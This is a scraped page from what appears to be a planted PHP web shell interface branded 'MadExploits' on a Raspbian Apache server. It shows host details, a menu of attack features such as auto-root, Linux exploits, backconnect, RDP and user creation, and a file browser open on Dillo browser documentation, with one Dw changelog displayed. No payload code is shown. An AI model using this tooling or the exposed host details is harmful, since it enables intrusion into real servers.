Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
dillo /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
2.31
KB
-rw-r--r--
Cache.txt.gz
2.35
KB
-rw-r--r--
Cookies.txt
2.35
KB
-rw-r--r--
Dillo.txt
3.51
KB
-rw-r--r--
Dpid.txt.gz
3.83
KB
-rw-r--r--
Dw.txt
217
B
-rw-r--r--
HtmlParser.txt
3.54
KB
-rw-r--r--
IO.txt.gz
7.49
KB
-rw-r--r--
Images.txt.gz
1.79
KB
-rw-r--r--
Imgbuf.txt.gz
2.64
KB
-rw-r--r--
NC_design.txt.gz
1.91
KB
-rw-r--r--
NEWS.Debian.gz
299
B
-rw-r--r--
NEWS.gz
494
B
-rw-r--r--
README
2
KB
-rw-r--r--
README.Debian
351
B
-rw-r--r--
Selection.txt.gz
2.16
KB
-rw-r--r--
changelog.Debian.gz
6.89
KB
-rw-r--r--
changelog.gz
35.04
KB
-rw-r--r--
copyright
2.38
KB
-rw-r--r--
dillorc.gz
5.14
KB
-rw-r--r--
dw-changes.doc
3.95
KB
-rw-r--r--
dw-example-screenshot.png
3.72
KB
-rw-r--r--
dw-images-and-backgrounds.doc....
2.73
KB
-rw-r--r--
dw-layout-views.doc.gz
3.22
KB
-rw-r--r--
dw-layout-widgets.doc.gz
3.24
KB
-rw-r--r--
dw-map.doc
2.19
KB
-rw-r--r--
dw-overview.doc.gz
1.8
KB
-rw-r--r--
dw-size-of-widget.png
2.76
KB
-rw-r--r--
dw-style-box-model.png
5
KB
-rw-r--r--
dw-style-length-absolute.png
756
B
-rw-r--r--
dw-style-length-percentage.png
1.08
KB
-rw-r--r--
dw-style-length-relative.png
1.06
KB
-rw-r--r--
dw-textblock-collapsing-spaces...
641
B
-rw-r--r--
dw-textblock-collapsing-spaces...
521
B
-rw-r--r--
dw-textblock-collapsing-spaces...
802
B
-rw-r--r--
dw-textblock-collapsing-spaces...
586
B
-rw-r--r--
dw-usage.doc.gz
3.79
KB
-rw-r--r--
dw-viewport-with-scrollbar.png
755
B
-rw-r--r--
dw-viewport-without-scrollbar....
542
B
-rw-r--r--
dw-widget-sizes.doc.gz
2.44
KB
-rw-r--r--
fltk-problems.doc.gz
1.75
KB
-rw-r--r--
index.doc
1.37
KB
-rw-r--r--
lout.doc
3.06
KB
-rw-r--r--
rounding-errors.doc
909
B
-rw-r--r--
uml-legend.doc.gz
1.46
KB
-rw-r--r--
user_help.html
13.66
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dw-changes.doc
/** \page dw-changes Changes to the GTK+-based Release Version <h2>Changes in Dw</h2> Related to the FLTK port, there have been many changes, this is a (hopefully complete) list: <ul> <li> Rendering abstraction, read \ref dw-overview and \ref dw-layout-views for details. Some important changes: <ul> <li> The underlying platform (e.g. the UI toolkit) is fully abstract, there are several platform independent structures replacing GTK+ structures, e.g. dw::core::Event. <li> The central class managing the widget tree is not anymore GtkDwViewport, but dw::core::Layout. <li> Drawing is done via dw::core::View, a pointer is passed to dw::core::Widget::draw. <li> The distinction between viewport coordinates and canvas coordinates (formerly world coordinates) has been mostly removed. (Only for views, it sometimes plays a role, see \ref dw-layout-views). </ul> <li> Cursors have been moved to dw::core::style, see dw::core::style::Style::cursor. dw::core::Widget::setCursor is now protected (and so only called by widget implementations). <li> World coordinates are now called canvas coordinates. <li> There is now a distinction between dw::core::style::StyleAttrs and dw::core::style::Style. <li> There is no base class for container widgets anymore. The former DwContainer::for_all has been removed, instead this functionality is now done via iterators (dw::core::Widget::iterator, dw::core::Iterator). <li> DwPage is now called dw::Textblock, and DwAlignedPage dw::AlignedTextblock. <li> dw::Textblock, all sub classes of it, and dw::Table do not read "limit_text_width" from the preferences, but get it as an argument. (May change again.) <li> dw::Table has been rewritten. <li> Instead of border_spacing in the old DwStyle, there are two attributes, dw::core::style::Style::hBorderSpacing and dw::core::style::Style::vBorderSpacing, since CSS allowes to specify two values. Without CSS, both attributes should have the same value. <li> Images are handled differently, see \ref dw-images-and-backgrounds. <li> Embedded UI widgets (formerly GtkWidget's) are handled differently, see dw::core::ui. <li> DwButton has been removed, instead, embedded UI widgets are used. See dw::core::ui and dw::core::ui::ComplexButtonResource. </ul> Dw is now written C++, the transition should be obvious. All "Dw" prefixes have been removed, instead, namespaces are used now: <ul> <li>dw::core contains the core, <li>dw::core::style styles, <li>dw::core::ui embedded UI resources, <li>dw::fltk classes related to FLTK, and <li>::dw the widgets. </ul> <h2>Documentation</h2> The old documentation has been moved to: <table> <tr><th colspan="2">Old <th>New <tr><td rowspan="2">Dw.txt <td>general part <td>\ref dw-overview, \ref dw-usage, \ref dw-layout-widgets, \ref dw-widget-sizes <tr><td>remarks on specific widgets <td>respective source files: dw::Bullet, dw::core::ui::Embed <tr><td rowspan="2">DwImage.txt <td>signals <td>dw::core::Layout::LinkReceiver <tr><td>rest <td>dw::Image, \ref dw-images-and-backgrounds <tr><td colspan="2">Imgbuf.txt <td>dw::core::Imgbuf, \ref dw-images-and-backgrounds <tr><td colspan="2">DwPage.txt <td>dw::Textblock <tr><td colspan="2">DwRender.txt <td>\ref dw-overview, \ref dw-layout-views, dw::core::ui <tr><td colspan="2">DwStyle.txt <td>dw::core::style <tr><td colspan="2">DwTable.txt <td>dw::Table <tr><td colspan="2">DwWidget.txt <td>dw::core::Widget, \ref dw-layout-widgets, \ref dw-widget-sizes <tr><td colspan="2">Selection.txt <td>dw::core::SelectionState </table> */
Close